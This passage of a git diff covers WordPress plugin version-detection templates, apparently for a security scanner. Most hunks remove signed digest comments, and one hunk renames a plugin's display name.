a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091617b19ddf960cdb3c8f16b4f238d830017f83285be4a7fa1d73d5eca0a3bb6022100b006c3b1d2fa8c8634e4fe885623dbd85360e57655e0351075301b18d2432d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index c6a5a1d4c4..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a5342be33992f83513b6f03b5ca09d7ca9b451525e30cdadebf99f93a9937ec022100d944f1bce87b3c936456508f41e3e23fcdcbfb36500f6d60f9140953e29521dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index e48c69c5a9..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055292c449bd77a631192b9b365a0e101ac7b0e613e3e6143033b2d6e84a169e102210083ac1bf194ea8e915bde334c82b4104aa362cb78f7d9759c52f1ba2f2a823ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 8231bd84d1..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b21dfe604a1e3863ff361b9cc644fb7f41c2506082e41557d0b231b3210d3ef022032325329bf7ca42a6775929743e022fa275c59640d645aa6945629e8885d10a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index c588400fd6..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e62c4938696662ae03a6252ac3573eefbda5dd5820b24501e91bfe2b87dbda9c02210086d5b7f46992ce2913a4a0540fdf260a57cfe5144059899e218e9c4c2274efd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 4651f20152..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210083a73bd0e039c34fd6adb7f92a15132061c9476793b85e44b7a0c8bf19f6fff0022100db0148a1b8dcbd18f85ab7ab71d92f0518f57dd069e9fa01898d2553623fd160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index bc046e3bfd..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef6998921a307c1d220b84bb6cb70f164e4fb92ffb20e9222a569c4d93977b2102203f9ca0cafc362146a16d883cf80b032508c4a32a8b51d62b5c254ba3cd871ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index b291d4bf84..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033928f76a97a4d694d9c8a01121f1432ec48f11e678e423ecc619724d96751c7022100821c1a873b99026e4ef8a0ad089c61ebe389fbc7f282e8050ea20ac97ecd4a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1cb693190a..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a689b7a35209f19c4ba726e2638e08dda198640ed2e3fa74277f7e696084a716022034019d6cf0169bcd4fda1bb07cde2439798885df8739c682134f5f737ec6de22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index abe2c32f55..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cd94fde4c95ced14d55f2d330c3d2c48a6d4c72a3878b730ae6172ec79fa9b4022100ebf5ba0a5b0d3d0e0e1f03e5bbb05c4d02375d42e4c6756ff4791901033c6f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 4811e53103..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028d8554f50f10132d885a4152e0e1b1528f7459fa6262bb876929ffa25e40225022100ff8a8ea25ed201cc10e4cacabaf7fe17bcfceb03c0c3b6bf11edadbb83881584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 1fc3397452..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092c8a54c6fa393c14d39dfd539ab0a7361b922f11b04fed6e388145b5ad42d3402204ad76a014eab160cd73b5da0d5d9de456f7f3b217bbe45563e15d8da7daecb01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index e5142182d5..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ae00806020ae5f6800518f79036ac0037d4d9a07c9433e9409269401dc31da40221008f257d08477220427fdc335715ad4e0b7544e4bfa199730e5a07c220eb119e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 2e0e18a427..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206081940d2795208ecb6a5cec6e504ebee94450164e31ceba84b82d617233e0000220036469417b079ae7ce7505a48128561497e952ac626e82e0cc134838a0004f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 571df53464..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f76064aad753435eeb6b0c22e00ff2d21fc0a39f36e818360d30ffe7332f576b0220596edc564942dcaae53e92a62f4f7d188ec9bb5cbf3892c275aa9a152cb95b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index c87b70ac0f..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220222358d1e3c0dc1883e97a37385620784b40f0c7b7853c91f1139546fb345e9e02201b46cb1d25041e3da329015da004a298bad46ff8f3fd62b4662f6f4ad4e36bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index d353ea1cb4..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cea90510edc57328e8a5e090d8389fe5ce798b4e22ce98fe7b741cdeff1a4bd502204458b2868a38561c27290d1ba4d38f46e4b5374965fc0808caa4a9d9446c8e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 8f702f716c..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca9defc4e78f9960c00041e723439c04d6ea4e1dbfdba3acee15529550e914150220653778a5f37fa6e256cecffddd9552fe364907d1266fab69b839504a7a4a0445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 770edf6ff9..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dbf919d2783da740413ba5aabd6d1c937b25fd1ddae857973a56a912dd6118fd022100aa74936095ddb6a710d0bc75886348853561a263fcd72b925c8cc2f57cff3651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 818a180009..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001815237d92d9d95969f772ca3df80cdb0ee462abb72a625abd13269f7198c0d022100af0e5bb19d55a4108d4d3d35805cd9d476d8db74a287fe46c882bbe218c7ddf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index cf4c3a3ab3..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dfa9aadfb1980eece54f168c013f006868f349446e81ea9c2890300c0f6974d9022100c098e9b4bc9f5e5e6c41b43194f71320474817044fee165502dd356666bc89eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index cec3e9643e..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdbce6f9d9b749b4f8ad153ffffacaa4f21950b449a841185e768e78a9cdfc64022100d5a6849109823e641d6cb311401d4146ebad58eafb9bda78401ae09ae91aca9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index dea0bc87e3..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d860ab5bae0c4b30033f2c90c82759e25bdb22b5a2264bca5a5b95dd0c5cf8a022100ca5f30cfafd303bee9eb95d390d7c400fe90cebb88f67dd5373e3b315d85d4b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 82d1882cf8..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef550d165759ee5048b761f21c5ed66495e5f3e4bbf48590c8205351b6a0c8c8022078bbe8022a5db68d860b2d6fdd316dd8ef738c5ad976a8f85168fca2a8ef953c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index d2cebfc775..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6e55a4ebb00f84c637984fb54406968d88b0cf74a6b6afac587f8c1d43226a60220041ad77b010103db6339aacef06ce1355ef1204ad67855733284654446cdad4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 8990099861..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009abe1c6b11111bf36ca437a81878c0be2e3acbdf77d3effec81636d7e80b8c9d0220041e5f4a741af0bc1eac011e9159b9d70a98cec2f44ec25e38bda78480e3a53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 9de8de736d..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -1,7 +1,7 @@ id: wordpress-pretty-link info: - name: Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection + name: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f533d70fdbb09250f4ba4e9b4b07acbd8e25e8733e0b261d60c0de220167668e02210092de89bddf02584b7e438a7f4c8cdbca9f3a8d50d51f4ef35ba2a23a41aaa350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 29fcc00937..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220082caa2627a1e658ca15a7e0473af612fbc75f1fab99f6261f1f76c005643e9902203f151ee793554360b3b6175020947a715140382fa33b7f77de4b7e4ee2bd0ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 3b2964a6f6..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074080838917265e564b46e7f2134fe3964fbcba58e9f8063dc0c4e601fecbbb1022100bea1996477d30ce364889a808646e57d708de2a5c232cd6aaacab58664b1d3da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index d6db95d7ae..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc2268a01812618fcae0aaf4e8b09ed7a11c0ebaf4ccae5e697f8d3710a3d10a022100ca60e815b14c93fe7dcf047c6d491690c075b838dcc0c709cff342373b7b21d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 363e29c18f..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae6ded14f844b0a2fc51860dc3922ebc311094efaba631cd6872cca4e04bd14002202924c779a83dbe53623dd3b8a41a5fd46b715dd894942fcd90e0c11fc975039a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4d382daaca..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220545378fea9fad1db006a88aa18f87995fee03de249b12cc8fa8cc144953a24220220225960699e84d8bb1304b2329c735651c1b93410dc7c00c3467bb195eae69f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 78775ca88c..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a70ea94d6bf2578f7e293b0cded6c533f5fa7bb5610aa90dbcb5d69d3ed122d022100b73f78d27a714eeaf29731af13525fa40ba41efdfc25bae499933b16ed78ddb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index cc3db8a295..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220022d04daf866021a397e1cba8a8df0e2113802c6d0278f339111b4b4e8ef449a022100b493acdde901ac69a10ae355c60916cb6c6a0f8d39c6b1bce783b7b543faf9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index f2cb4dc903..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af2dc914a58f1b3737ae9e8f869d949871d75ed7a9810b5cba2c33d9068de1800221008c39a9b5a8d7540c87baae7e09cbb0216b7ff6c7715b6afbe0811825c9bc1776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index e2b9f88bb5..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078f53b492dad12293f800d2318f14e249e4981bbea7dfd2c5f529236f2e9b9d0022008d83f837ec31af7d193de89b8667cdb9f55f862b7d467f3ddfff7a9ebd36d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 24981e8701..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a813d4e647dd4d77ff11d43a768b5c57948181ca69bed2a13550db5cc008a74e02203182a3221254f3ce49873c5bbd04b0c98ff84d4e9821fd36bf48f628a04f75a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index e1e9928d81..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097d3b3bc4c13a0fb79d3a5f5eceaf815490f1af8a506f3c4940f1d23b9211fb902210085a9906ac4d875f5d124ccf087bb612787d2cc84a0fe342abe42c4136fdb66b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 57be92ba5c..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203758c9b7a074ddbcfb092aecc8977a211464b402472520c1ddab3bee32aa0153022034f0e4d4dbec5e971a47a90faf70e20f2da06d0ac5173ad9dbd36b79ecadd936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 2588beaa31..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044b38d7a7cc8cff1714f48aa0d131b2b841e6eee5c7994ee75fb7179b1fd8188022032912b8f05177a8bbd3827ea2e08b154ed43fbd2d6ea41efc5e0e295b169ec71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 86a29ec1b3..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b9f378b06bd4e7c217a410c65aa49f0c9dca8182660601076dcdf6c6a601713022100b375f235d2146edd8df3379eab6a455edf2ee0a7540132592589eec32700597a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index fb8759c303..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ead590bdcddc99181f41de6f79f11d4c8e3fa2efd5c478f1e5fd954bbebb3a52022100a7137aa19d11519c89b6ac5b63d4494ba0587822ca44700437fb5a23fd441237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 06d477d58e..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd023dc3865dd6282f276879925d9b52ef6a4b83d5b2ce082d816195a46377f00220195c58304c73ff8c1777d912aec3abda12ac179af3677b451f71de5430b82dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 72f2d9232d..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb6e99ace0c5d7ffae0c8a3bbcfc1deea7921320c834d5809b860134874d09b50220112238f4b7729ca3504a4d1ef949884669697400f9e8535a7bf6ac88b98a58e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 980cd6f356..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008feed2b7950f6c993b5ad57cbf88ba5c90fb7079b393f1c63015068fe6eb0b5c022100f176c115baddf72c30947d1a0f9dac1c43c6870d673f32a6de4e875906fa7f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index aa162e1d1c..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eff6b5a33cef429e0acb6ad98372cbea4e442b54cf4e2d48ec602343f90ccb94022031fd28390e05f5efa39cbd4b32395bed64efe8b20aafddaacb1abcf627a33a39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 299f33fb12..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b28fe478a4ad16bf8095e68b3f0e20734f30862413846e0ad505f7b49c22a35c02205567686f552113a8dd97c8361d2a30e73606311154abc67f7cc8718804b26be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml 